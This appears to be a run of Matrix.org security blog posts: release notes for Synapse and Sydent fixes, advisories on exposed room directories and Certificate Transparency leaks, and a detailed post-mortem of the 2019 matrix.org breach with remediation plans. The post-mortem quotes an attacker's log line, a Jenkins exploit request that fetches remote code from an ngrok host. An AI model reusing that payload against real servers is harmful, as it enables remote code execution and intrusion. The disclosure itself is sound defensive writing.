Folks, today we are releasing Synapse 1.15.2, which is a security release which contains fixes to two separate problems. We are also putting out the second release candidate for the forthcoming Synapse 1.16, including the same fixes.
Firstly, we have fixed a bug in the implementation of the room state resolution algorithm which could cause users to be unexpectedly ejected from rooms (Synapse issue #7742).
Secondly, we have improved the security of pages served as part of the Single-Sign-on login flows to prevent clickjacking attacks. Thank you to Quentin Gliech for reporting this.
We are not aware of either of these vulnerabilities being exploited in the wild, but we recommend that administrators upgrade as soon as possible. Those on Synapse 1.15.1 or earlier should upgrade to Synapse 1.15.2, while those who have already upgraded to Synapse 1.16.0rc1 should upgrade to 1.16.0rc2.
Get the new releases from any of the usual sources mentioned at https://github.com/matrix-org/synapse/blob/master/INSTALL.md. 1.15.2 is on github here, and 1.16.0rc2 is here.
Changelog for 1.15.2 follows:
Due to the two security issues highlighted below, server administrators are encouraged to update Synapse. We are not aware of these vulnerabilities being exploited in the wild.
A malicious homeserver could force Synapse to reset the state in a room to a small subset of the correct state. This affects all Synapse deployments which federate with untrusted servers. (96e9afe6)
HTML pages served via Synapse were vulnerable to clickjacking attacks. This predominantly affects homeservers with single-sign-on enabled, but all server administrators are encouraged to upgrade. (ea26e9a9)
This was reported by Quentin Gliech.
Hi all,
Over the course of today we've been made aware of folks port-scanning the general internet to discover private Matrix servers, looking for publicly visible room directories, and then trying to join rooms listed in them.
If you are running a Matrix server that is intended to be private, you must correctly configure your server to not expose its public room list to the general public - and also ensure that any sensitive rooms are invite-only (especially if the server is federated with the public Matrix network).
In Synapse, this means ensuring that the following options are set correctly in
your homeserver.yaml
:
# If set to 'false', requires authentication to access the server's public rooms
# directory through the client API. Defaults to 'true'.
#
#allow_public_rooms_without_auth: false
# If set to 'false', forbids any other homeserver to fetch the server's public
# rooms directory via federation. Defaults to 'true'.
#
#allow_public_rooms_over_federation: false
For private servers, you will almost certainly want to explicitly set these to
false
, meaning that the server's "public" room directory is hidden from the
general internet and wider Matrix network.
You can test whether your room directory is visible to arbitrary Matrix clients on the general internet by viewing a URL like https://sandbox.modular.im/_matrix/client/r0/publicRooms (but for your server). If it gives a "Missing access token" error, you are okay.
You can test whether your room directory is visible to arbitrary Matrix servers on the general internet by loading Riot (or similar) on another server, and entering the target server's domain name into the room directory's server selection box. If you can't see any rooms, then are okay.
Relatedly, please ensure that any sensitive rooms are set to be "invite only" and room history is not world visible - particularly if your server is federated, or if it has public registration enabled. This stops random members of the public peeking into them (let alone joining them).
Relying on security-by-obscurity is a very bad idea: all it takes is for someone to scan the whole internet for Matrix servers, and then trying to join (say) #finance on each discovered domain (either by signing up on that server or by trying to join over federation) to cause problems.
Finally, if you don't want the general public reading your room directory, please also remember to turn off public registration on your homeserver. Otherwise even with the changes above, if randoms can sign up on your server to view & join rooms then all bets are off.
We'll be rethinking the security model of room directories in future (e.g. whether to default them to being only visible to registered users on the local server, or whether to replace per-server directories with per-community directories with finer grained access control, etc) - but until this is sorted, please heed this advice.
If you have concerns about randoms having managed to discover or join rooms which should have been private, please contact [email protected].
Hi all,
This morning (06:11 UTC) it became apparent through mails to [email protected] that a security researcher was working through the TLS Certificate Transparency logs for *.matrix.org
,*.riot.im
and *.modular.im
to identify and try to access non-public services run by New Vector (the company formed by the original Matrix team, which hosts *.matrix.org
on behalf of the Matrix.org Foundation, and develops Riot and runs the https://modular.im hosting service).
Certificate Transparency (CT) is a feature of the TLS ecosystem which lets you see which public certificates have been created and signed by given authorities - intended to help identify and mitigate against malicious certificates. This means that the DNS name of any host with a dedicated public TLS certificate (i.e. not using a wildcard certificate) is visible to the general public.
In practice, this revealed a handful of internal-facing services using dedicated public TLS certificates which were accessible to the general internet - some of which should have been locked to be acessible only from our internal network.
Specifically:
kibana.ap-southeast-1.k8s.i.modular.im
- a Kibana deployment for a new experimental Modular cluster which is being set up in SE Asia. The Kibana is in the middle of being deployed, and was exposed without authentication during deployment due to a firewall & config error. However, it is not a production system and carries no production traffic or user data (it was just being used for experimentation for hypothetical geography-specific Modular deployments). We firewalled this off at 07:53 UTC, and are doing analysis to confirm there was no further compromise, and will then rebuild the cluster (having fixed the firewall config error from repeating).Additionally, certain historical Modular homeservers & Riots (from before we switched to using wildcard certs, or where we’ve created a custom LetsEncrypt certificate for the server) are named in the CT logs - thus leaking the server’s name (which is typically public anyway in that server’s matrix IDs if the server is federated).
We’re working through the services whose names were exposed checking for any other issues, but other than the non-production SE Asia Kibana instance we are not aware of problems resulting from this activity.
Meanwhile, we’ll be ensuring that semi-internal services are only exposed on our internal network in future, and that Modular server names are not exposed by CT logs where possible.
TL;DR: You can list all the public non-wildcard TLS certs for a given domain by looking somewhere like https://crt.sh/?q=%25.matrix.org. This lets you find internal-sounding services to try to attack. In practice no production services were compromised, and most of our internal services are correctly firewalled from the public internet. However, we’re reviewing the IP locking for ones in the grey zone (and preventing the bug which caused an experimental Kibana to be exposed without auth).
We’d like to thank Linda Lapinlampi for notifying us about this. We’d also like to remind everyone that we operate a Security Disclosure Policy (SDP) and Hall of Fame at https://matrix.org/security-disclosure-policy/ which is designed to protect innocent users from being hurt by security issues - everyone: please consider disclosing issues responsibly to us as per the SDP.
Hi all,
On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.
Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.
Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.
In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.
This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)
Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.
Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.
Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.
The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.
In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.
Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.
Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).
Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).
So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.
The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.
In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2
on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2
file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.
At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:
matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/[email protected](disableChecksums=true)%[email protected](name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%[email protected](group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
/usr/share/bsd-mail/shroot
).By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.
We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).
Given the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.
At about 4am we had enough of the bare necessities back up and running to pause for sleep.
At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).
On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...
...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.
Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.
To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.
The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:
Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:
Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.
In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:
Apologies again that it took longer to get some of these services back up than we’d prefered (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.
Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.
We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.
We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.
We’ve split the remediation work into the following domains.
Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:
SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.
The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:
Warning: You may be tempted to use a wildcard like
Host *
to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding
As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes
in their ssh client configs, thinking “well, what can we trust if not our own servers?”
This was a massive, massive mistake.
If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A
.
Our remediations for this are:
ssh -J $host
.rsync -e "ssh -J $host"
Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c
, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.
Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.
Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.
A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.
Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).
We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.
We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys
(or ~/.ssh/authorized_keys2
for that matter) - we can see no benefit from letting non-root users set keys.
Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account
(using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u
directive).
If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.
Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).
If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).
We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.
As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.
We are addressing this by:
We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.
Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).
Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.
Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.
Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.
There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.
There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:
One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.
This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.
Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.
None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.
One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.
Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).
In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:
Alternatives here included:
The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.
The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
Other than CI, our strategy is:
Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.
However, we can still improve our logging and PII-handling substantially:
Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:
Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.
Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.
On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.
Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.Hi all,
Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.
We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).
Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.
Sydent 1.0.3 has three security fixes:
If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.
Synapse 0.99.3.1 is a security update for two fixes:
You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.
(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)
Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:
The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.
If you haven’t already updated, please do so now.
On Thursday Jan 10th we released a Critical Security Update (Synapse 0.34.0.1/0.34.1.1), which fixes a serious security bug in Synapse 0.34.0 and earlier. Many deployments have now upgraded to 0.34.0.1 or 0.34.1.1, and we now consider it appropriate to disclose more information about the issue, to provide context and encourage the remaining affected servers to upgrade as soon as possible.
In Synapse 0.11 (Nov 2015) we added a configuration parameter called “macaroon_secret_key” which relates to our use of macaroons in authentication. Macaroons are authentication tokens which must be signed by the server which generates them, to prevent them being forged by attackers. “macaroon_secret_key” defines the key which is used for this signature, and it must therefore be kept secret to preserve the security of the server.
If the option is not set, Synapse will attempt to derive a secret key from other secrets specified in the configuration file. However, in all versions of Synapse up to and including 0.34.0, this process was faulty and a predictable value was used instead.
So if, your homeserver.yaml does not contain a macaroon_secret_key, you need to upgrade to 0.34.1.1 or 0.34.0.1 or Debian 0.34.0-3~bpo9+2 immediately to prevent the risk of account hijacking.The vulnerability affects any Synapse installation which does not have a macaroon_secret_key setting. For example, the Debian and Ubuntu packages from Matrix.org, Debian and Ubuntu include a configuration file without an explicit macaroon_secret_key and must upgrade. Anyone who hasn't updated their config since Nov 2015 or who grandfathered their config from the Debian/Ubuntu packages will likely also be affected.
We are not aware of this vulnerability being exploited in the wild, but if you are running an affected server it may still be wise to check your synapse's user_ips database table for any unexpected access to your server's accounts. You could also check your accounts' device lists (shown under Settings in Riot) for unexpected devices, although this is not as reliable as an attacker could cover their tracks to remove unexpected devices.
We'll publish a full post-mortem of the issue once we are confident that most affected servers have been upgraded.
We'd like to apologise for the inconvenience caused by this - especially to folks who upgraded since Friday who were in practice not affected. Due to the nature of the issue we wanted to minimise details about the issue until people had a chance to upgrade. We also did not follow a planned disclosure procedure because Synapse 0.34.1 already unintentionally disclosed the existence of the bug by fixing it (causing the logout bug for affected users which led us to pull the original Synapse 0.34.1 release).
On the plus side, we are approaching the end of beta for Synapse, and going forwards hope to see much better stability and security across the board.
Thanks again for your patience,
The Matrix.org Team